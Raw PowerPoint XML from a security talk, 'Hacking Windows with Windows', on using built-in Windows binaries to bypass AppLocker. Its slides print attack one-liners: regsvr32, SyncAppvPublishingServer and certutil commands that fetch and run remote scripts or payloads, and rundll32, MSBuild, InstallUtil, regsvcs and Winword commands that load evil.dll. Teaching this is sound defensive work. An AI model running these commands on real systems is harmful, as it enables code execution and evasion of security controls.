            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>binaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2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059582"/>
            <a:ext cx="8229600" cy="3240360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>needs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>functionality</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upload</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execute</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compile</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2800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35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pbs.twimg.com/media/DTwY8WRVMAAZ0sl.jpg:large">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7015EF7-B607-4BCE-A812-065709034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-3117"/>
            <a:ext cx="63420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71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B926FDA0-35DB-413D-81C4-5A3D9445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469926"/>
            <a:ext cx="8229600" cy="2253952"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BINARY EXECUTION EXAMPLES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85694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B926FDA0-35DB-413D-81C4-5A3D94454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059582"/>
            <a:ext cx="4032448" cy="2736304"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Probably</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> feelings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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C74821E4-5F4E-402F-8A80-7640DE84D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123478"/>
            <a:ext cx="2664296" cy="47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49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REGSVR32.exe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Register and unregister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DLL files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806645E-B472-49E4-9ED8-B4899752C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635646"/>
            <a:ext cx="6267231" cy="31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29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REGSVR32.exe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regsvr32 /s /n /u /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i:http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.sct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> scrobj.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Proxy aware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239A02C-9AD7-47CB-A33A-2AD26CCBE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090940"/>
            <a:ext cx="6610649" cy="28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Regsvr32-calc">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A21AAA92-1813-463A-8523-37FEA198FB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10354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5DE980D-BB94-43C9-8D7F-E824D3E86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91" y="1275606"/>
            <a:ext cx="9001000" cy="3744416"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="4800" b="1" dirty="0"/>
              <a:t>Hacking Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="4800" b="1" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="4800" b="1" dirty="0"/>
              <a:t> Windows</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="4800" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="nb-NO" sz="4800" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="nb-NO" sz="4800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3083012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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Congratulations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Oddvar – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You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started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Calc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="24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3572045"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>calc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the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danger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>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the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danger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There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are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projects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>….</a:t>
            </a:r>
          </a:p>
          <a:p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accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>popped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>other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stuff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!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D61ADFF-F766-49FE-B6CA-2A1BCA52E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43069"/>
            <a:ext cx="4536504" cy="1046886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B66FFD12-94D0-41E4-BAF9-06E3E8A57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914400"/>
            <a:ext cx="2778729" cy="240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04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RUNDLL32.exe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Execute DLL files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E490EC5-A3AB-420E-861D-E5AAF1334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1059582"/>
            <a:ext cx="4153113" cy="38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8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RUNDLL32.exe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Attack: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rundll32.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:"\..\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mshtml,RunHTMLApplication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ";alert(‘NIC%20Rules');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Details: https://stackoverflow.com/questions/25131484/rundll32-exe-javascript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87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Rundll32-Javascript">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FBE5FDB-AC77-4D0A-A8FA-1CABAAC5B9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5442" y="92075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4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SyncAppvPublishingServer.exe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Used to refresh APP-V applications on client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55477F2-5DE5-454F-B271-1FA742E13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2123811"/>
            <a:ext cx="6432881" cy="13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2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SyncAppvPublishingServer.exe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SyncAppvPublishingServer.exe "n;((New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('http://some.url/script.ps1') | IEX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Command injection vulnerability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4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SyncAppvPublishingServer-Powershell">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BB22680-61AE-4AC9-A03F-7A02B38E6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8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CERTUTIL.exe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Used for certificates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A031CC2-D285-48DD-A02D-F35E9FCFE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419622"/>
            <a:ext cx="5169166" cy="38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37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CERTUTIL.exe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certutil.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>urlcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe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certutil.exe /decode base64kodetfil.txt evil.dll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Certutil-download-decode">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{394E37EE-9D31-4740-9FD9-1888C0C5BA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2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-1044624" y="267494"/>
            <a:ext cx="6923112" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Aduser ‘Oddvar Moe’</a:t>
            </a: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MVP for 2 years</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IT-industry since 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MCP at 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dedicated Security 5 years+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Huge meme and gif fan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Research - CVE-2017-8625</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Work @ Advania in Norway</a:t>
            </a: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E6421B51-D8FD-4F49-9E06-61E3BA4A9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02598"/>
            <a:ext cx="3511868" cy="40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MSBUILD.exe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5A953F3F-6808-4626-8CFD-67848D299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963" y="774929"/>
            <a:ext cx="6343976" cy="1581231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73ACD3CC-6572-436B-84F9-D9D6FC676E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05" y="2643758"/>
            <a:ext cx="6502734" cy="21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35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MSBUILD.exe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Msbuild.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MSBuildshell.cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  -- PowerShell without PowerShell!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27D46163-BD2C-4F8D-9BDF-159498F79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257818"/>
            <a:ext cx="4978810" cy="38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1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MSBuild-PowershellWOPosh">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A1DDEB7-0B8C-403F-B46D-94BFC9455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5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INSTALLUTIL.exe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Used to (un)install services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045D61B-1859-4555-BAEB-D0D2AE615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1779662"/>
            <a:ext cx="6401129" cy="230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17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INSTALLUTIL.exe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InstallUtil.exe /logfile= /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LogToConsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=false /U C:\poc\evil.dll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157C21A4-39B9-426D-BA8E-A4F235D4E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347614"/>
            <a:ext cx="5832648" cy="34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9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nstallUtil-Calc">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76259772-F802-4616-8C90-AED44D079B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0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Regsvcs.exe and regasm.exe</a:t>
            </a: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3079D47-1059-4B66-BE72-49A6348C4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369" y="801226"/>
            <a:ext cx="6077262" cy="202575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4F2AE4D4-883F-4233-A48A-7F31B0727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294" y="2877184"/>
            <a:ext cx="6229670" cy="18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36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Regsvcs.exe and regasm.exe</a:t>
            </a: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683568" y="1635646"/>
            <a:ext cx="8229600" cy="2663825"/>
          </a:xfrm>
        </p:spPr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regsvcs.exe C:\poc\evil.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>regasm.exe /u C:\poc\evil.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="36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996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Winword.exe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Word is used for Office files.</a:t>
            </a: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A58C9660-B0C0-4505-B40C-71D29B73A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59582"/>
            <a:ext cx="4413870" cy="29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2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Winword.exe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Winword.exe /l dllfile.dll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53068F4-798B-4EE0-8754-0D3A9B9F4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4" y="1471459"/>
            <a:ext cx="7931512" cy="28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1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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cover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941280"/>
            <a:ext cx="8229600" cy="4078741"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How hacking has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evolved</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>binaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>legacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stuff</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> valid AppLocker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bypasses</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
